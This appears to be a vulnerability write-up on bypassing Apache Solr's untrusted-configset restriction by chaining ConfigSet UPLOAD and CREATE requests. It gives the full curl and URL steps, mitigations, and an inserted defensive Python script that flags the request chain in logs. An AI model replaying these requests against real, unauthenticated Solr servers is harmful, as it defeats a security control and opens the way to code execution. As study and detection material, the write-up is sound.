Affected versions
- 6.6.0 to 6.6.5
- 7.0.0 to 7.7.3
- 8.0.0 to 8.6.2
Vulnerability description
Solr blocks certain dangerous features from being configured through a ConfigSet uploaded via the API, because such operations can easily lead to RCE. That restriction can be bypassed by combining the UPLOAD and CREATE actions.
Original text
Solr prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that’s uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.
Exploitation conditions
- No authentication is configured for the Solr API
- Solr is started in SolrCloud mode (Standalone mode does not provide the Configset API)
Upload a Configset
Upload is enabled by default unless the following JVM argument is set:
-Dconfigset.upload.enabled=false
Vulnerability description / principle:
Normally a configset uploaded via UPLOAD cannot be used to create a collection; attempting to do so produces this error:
The configset for this collection was uploaded without any authentication in place, and use of <lib> is not available for collections with untrusted configsets. To use this component, re-upload the configset after enabling authentication and authorization.

But if we first UPLOAD, then use CREATE to derive a new configset from it and create a collection on that, the restriction is bypassed:
The effect is that we can define a custom configset and then create a malicious collection based on it. I have not yet figured out how to turn this custom configuration into RCE; I only know of the earlier template injection, but doesn't that have version limitations?
Steps:
1. [UPLOAD] Prepare the malicious configuration, package it, and upload it
# First package the configuration as a zip
(cd solr/server/solr/configsets/sample_techproducts_configs/conf && zip -r - *) > db-configset.zip
# Then upload the zip via the upload API
curl -X POST --header "Content-Type:application/octet-stream" --data-binary @db-configset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=db-configset"
2. [CREATE] Create a new configset based on the UPLOADed one, bypassing the restriction that a collection cannot be created directly from an UPLOADed configset
/solr/admin/configs?action=CREATE&name=db-configset1&baseConfigSet=db-configset&configSetProp.immutable=false&wt=xml&omitHeader=true
3. [LIST] List the configsets to confirm that the new configset has been generated
/solr/admin/configs?action=LIST&omitHeader=true
4. Create the malicious collection from the configset obtained via CREATE
/solr/admin/collections?action=CREATE&numShards=1&name=coll_test1&collection.configName=db-configset1
5. Exploit it using the earlier vulnerability?
Fix / mitigation
- Disable the UPLOAD command, i.e. set -Dconfigset.upload.enabled=false
- Enable authentication
- Upgrade to 8.6.3 or later
- If upgrading is not possible, try applying this patch: SOLR-14663
- Set firewall rules for access control and whitelist access to the Solr API
References
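As a defender-side check added here (not part of the original post), the script below tests a Solr version string against the affected ranges listed above and walks a request log for the UPLOAD -> CREATE(baseConfigSet) -> collection CREATE chain described in the steps. The NCSA-style log format and the sample lines are constructed assumptions; any log that exposes the request URL would work the same way.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Affected version ranges from the advisory, inclusive.
AFFECTED = [((6, 6, 0), (6, 6, 5)), ((7, 0, 0), (7, 7, 3)), ((8, 0, 0), (8, 6, 2))]

def is_affected(version):
    """True if a dotted Solr version string falls inside an affected range."""
    v = tuple(int(p) for p in version.split(".")[:3])
    return any(lo <= v <= hi for lo, hi in AFFECTED)

# Pulls the request target out of an NCSA-style request log line
# (assumption: the format the embedded Jetty request log writes).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def configset_bypass_chains(lines):
    """Return (uploaded, derived, collection) triples where a collection was
    created from a configset that CREATE derived from an UPLOADed one."""
    uploaded, derived, hits = set(), {}, []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        q = {k: v[0] for k, v in parse_qs(url.query).items()}
        action = q.get("action", "").upper()
        if url.path.endswith("/admin/configs"):
            if action == "UPLOAD" and "name" in q:
                uploaded.add(q["name"])
            elif action == "CREATE" and q.get("baseConfigSet") in uploaded:
                derived[q.get("name")] = q["baseConfigSet"]
        elif url.path.endswith("/admin/collections") and action == "CREATE":
            cfg = q.get("collection.configName")
            if cfg in derived:
                hits.append((derived[cfg], cfg, q.get("name")))
    return hits

# Constructed sample log: the three-step chain from this page plus one
# benign collection CREATE that uses a built-in configset.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Oct/2020:10:00:01 +0000] "POST /solr/admin/configs?action=UPLOAD&name=db-configset HTTP/1.1" 200 77',
    '10.0.0.5 - - [19/Oct/2020:10:00:05 +0000] "GET /solr/admin/configs?action=CREATE&name=db-configset1&baseConfigSet=db-configset&configSetProp.immutable=false&wt=xml HTTP/1.1" 200 120',
    '10.0.0.5 - - [19/Oct/2020:10:00:09 +0000] "GET /solr/admin/collections?action=CREATE&numShards=1&name=coll_test1&collection.configName=db-configset1 HTTP/1.1" 200 300',
    '10.0.0.7 - - [19/Oct/2020:10:01:00 +0000] "GET /solr/admin/collections?action=CREATE&name=ok&collection.configName=_default HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    print("8.6.2 affected:", is_affected("8.6.2"))  # True
    print("8.6.3 affected:", is_affected("8.6.3"))  # False
    print(configset_bypass_chains(SAMPLE_LOG))      # [('db-configset', 'db-configset1', 'coll_test1')]
```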
- https://seclists.org/oss-sec/2020/q4/47
- ConfigSets CREATE does not set trusted flag
- https://issues.apache.org/jira/browse/SOLR-14925
Note
Reference:
http://mail-archives.apache.org/mod_mbox/lucene-solr-user/201807.mbox/%3CCAPCX2-+jojXrWvPSPiBR_xwphdpk+yPM2HYLojX2rqRTKMGm9g@mail.gmail.com%3E
Solr can run in two modes: "Cloud" mode or "Standalone" mode.
In SolrCloud mode you can create collections, whereas in Standalone mode you can only create cores.
In Standalone mode the request returns 400:

Shut it down and restart in SolrCloud mode:
This time it succeeds:

Appendix
Uploading configsets
# First package the configuration as a zip
(cd solr/server/solr/configsets/sample_techproducts_configs/conf && zip -r - *) > myconfigset.zip
# Then upload the zip via the upload API
curl -X POST --header "Content-Type:application/octet-stream" --data-binary @myconfigset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=myConfigSet"
Creating configsets
Create a new configset based on the previously uploaded configset
- name: the name of the new configset
- baseConfigSet: which uploaded configset to base it on
- configSetProp.immutable: set this to false
http://cqq.com:8983/solr/admin/configs?action=CREATE&name=myConfigSet1&baseConfigSet=myConfigSet&configSetProp.immutable=false&wt=xml&omitHeader=true
Listing configsets:
http://cqq.com:8983/solr/admin/configs?action=LIST&omitHeader=true

Uploaded and created configsets are not stored on the file system but in ZooKeeper:
The Configsets API enables you to upload new configsets to ZooKeeper, create, and delete configsets when Solr is running SolrCloud mode.
This API provides a way to upload configuration files to ZooKeeper and share the same set of configuration files between two or more collections.